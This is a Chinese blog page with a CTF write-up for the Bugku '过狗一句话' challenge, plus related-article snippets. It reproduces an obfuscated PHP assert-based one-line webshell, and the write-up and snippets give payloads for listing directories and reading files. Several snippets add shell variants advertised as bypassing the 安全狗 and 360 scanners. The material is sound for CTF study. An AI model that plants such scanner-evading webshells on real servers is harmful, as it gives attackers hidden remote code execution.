【bugku】过狗一句话 writeup

最新推荐文章于 2022-05-03 18:05:13 发布

原创最新推荐文章于 2022-05-03 18:05:13 发布 · 7.9k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#ctf #网络安全 #bugku

ctf 专栏收录该内容

8 篇文章

订阅专栏

本文通过一个PHP代码实例展示了如何利用assert函数实现任意代码执行，包括构造payload进行目录扫描及读取文件等操作。

过狗一句话

题目提示里的php代码拿下来

<?php $poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

用assert执行任意代码
这就很自由了
payload：http://120.24.86.145:8010/?s=print_r(scandir('./')); 扫描目录
这里写图片描述

然后读取flag.txt

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

perye

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【bugku】CTF-练习平台writeup

perye

03-03

4318

CTF-练习平台writeupCTF-练习平台MISC滴答~滴看标题基本就知道是摩尔斯密码“.”、”-“，直接在线摩尔斯解密聪明的小羊小羊。。。老套路翻栅栏，栅栏密码。。。比较简单，直接看出来是两栏加密 KEY{sad23jjdsa2}这是一张单纯的图片？？看题目估计是道隐写术的题，先保存图片的说； 30分的题，估计不会太难，直接文本编辑器打开；文本末尾发现了一行转义序列：看来这就是flag...

bugkuctf web基础部分 writeup

river

03-20

3104

Bugku-ctf-web 管理员系统随便输入用户名和密码提示窗体顶端窗体底端 IP禁止访问，请联系本地管理员登陆，IP已被记录. 明显需要伪造允许登录的IP 知识点： XFF头(X-Forwarded-For)，代表客户端，也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得，另一个是从X-Forward-For中...

参与评论您还未登录，请先登录后发表或查看评论

BugkuCTF：过狗一句话（web）

s0il的博客

04-19

2639

题目描述：上面的php进行格式化之后： <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_...

Bugku-web(三)

weixin_44866139的博客

02-18

387

welcom to bugku 题目好像不能访问了，看看其他博主的博客吧 https://www.cnblogs.com/Pinging/p/8278168.html 过狗一句话 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_...

bugku学习之26.过狗一句话 - 解题及其它完整（bypass绕过）重点！！！

s11show_163的博客

03-01

1214

打不开但是原理比较重要，去回顾bypass安全狗绕过的相关知识用php的系统函数，突破低权限。题目来自于bugku的"过狗一句话"，这道题目有接近2100人做出来，可是网上的wp并没有给出确切的原理，所以在此借这一道题目，抛砖引入。一丶代码和分析 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //exp...

bugku 过狗一句话

Superpig的博客

11-12

808

分析根据提示，分析得关键在于assert()，查资料得assert()用于调试，跟eval()差不多，但是eval()只能执行符合php编码规范的$code_str 解题构造payload http://123.206.87.240:8010/?s=print_r(scandir(’./’)); 得到目录结构再访问http://123.206.87.240:8010/fl4g.txt 即...

过狗一句话 -Bugku

j7ur8

06-21

1198

搜索到的几种解法： 1. s=print_r(scandir('./')) 然后读取flag.txt 2. s=print_r(glob("*.*")) 然后读取show_source(flag.txt) 3. 使用flag_get_contents(flag.txt)读取文件 eg: 还有system('ls')的读取方法但是这里应该没有权限....

Bugku 文件包含2 writeup 绕过过滤

zazazrt的博客

02-18

1833

首先附上网站源码http://123.206.31.85:49166/ index.php  <?php if(!isset($_GET['file'])) { header('Location: ./index.php?file=hello.php'); exit(); } ...

BugkuCTF(Web) WriteUp

CallMeSa1tyFish的博客

08-06

6300

Web部分 web2 点开以后发现是满屏的滑稽，按照国际惯例，查看源代码发现flag 文件上传测试用burp抓包修改文件名后缀为.php 计算器修改最大长度限制 web基础$_GET 题目如下 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 直接输入?what=fla...

bugku-writeup-MISC-白哥的鸽子

dark的博客

07-01

352

题目：白哥的鸽子工具：010 editor 01—找线索打开附件，为一张gugugu.jpg的图片。使用010 editor打开gugugu.jpg文件，找寻线索，下拉到最后，发现最后一串字符没有乱码，复制。 02—栅栏解码使用栅栏在线解码工具：https://tool.bugku.com/jiemi/，第一种解密方式，栏数设置为3，解密。第2种解密方式：选择默认栏数2，列举解密，这样在3栏的时候得到flag。 03—拓展栅栏密码，把要加密的明文分成N个一组

过安全狗的aspx一句话webshell

02-08

过安全狗的aspx一句话webshell 纯CS模式，经典免杀

最新过安全狗一句话

10-14

最新过安全狗一句话

Bugku web 过狗一句话

Amire0x的小乐园

05-05

381

学到了以前不知道的新东西题目链接直接看代码 explode（）：使用一个字符串分割整个字符串，并返回由字符串组成的数组。 assert（）：把字符串按照php代码来执行。这样一来$poc_2就是assert，即现在的结果是assert($_GET['s']) 这下就可以估计flag应该是藏在某个文件里了于是用到一个扫描目录的函数 scandir()列出指定路径中的文件和目录 glob()...

【bugkuctf】过狗一句话 writeup

lansefly1990的专栏

10-02

1323

过狗一句话 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 用assert执行任意代码 payload：http://120.24.86.145:...

一句话木马过狗 php,PHP一句话木马过安全狗等杀软

weixin_30774813的博客

03-09

928

第一种：1.php=($_=@$_GET[2]).@$_($_GET[1])?>用中国菜刀连接：http://www.cn-caidao.com/1.php?2=assert密码是1第二种：2.php$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>=${'_'.$_}['_'](${'_'....

bugku——过狗一句话（奇淫技巧）

地址ch3nye.top

08-29

9977

今天学校ctf战队给了个bugku的题不过改了一下，我觉得挺有意思的，做一下记录。题目 <?php $poc = "a#s#s#e#r#t"; $poc_1 = explode("#", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5]; $poc_2...

经过变异新的一句话（过360，安全狗）

weixin_30527323的博客

08-03

457

只测试了360网马查杀和安全狗网马查杀，均未被发现 <?php$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr...

过狗一句话原理与利用

金色%夕阳的博客

05-03

2343

过狗一句话原理与利用在之前的文件上传漏洞中就有介绍过木马文件，通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中，可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤，从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护，比如安全狗。因此，学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句话，该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。在学习过狗一句话之前，需要先学习一句话木马

CTF之Bugku 过狗的一句话

weixin_41607190的博客

10-03

544

原理：利用assert()函数的漏洞----如果参数中返回的是false，报错但继续执行 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?> 上面是题目...

Bugku杂项题目Writeup解析与总结

根据给定的信息，该文档的内容似乎是围绕“bugku杂项题writeup”这个标题展开的，这通常是指一个网络安全竞赛平台（CTF，Capture The Flag）中的杂项（Miscellaneous）类别题目解法的说明文档。杂项题目通常包括各种...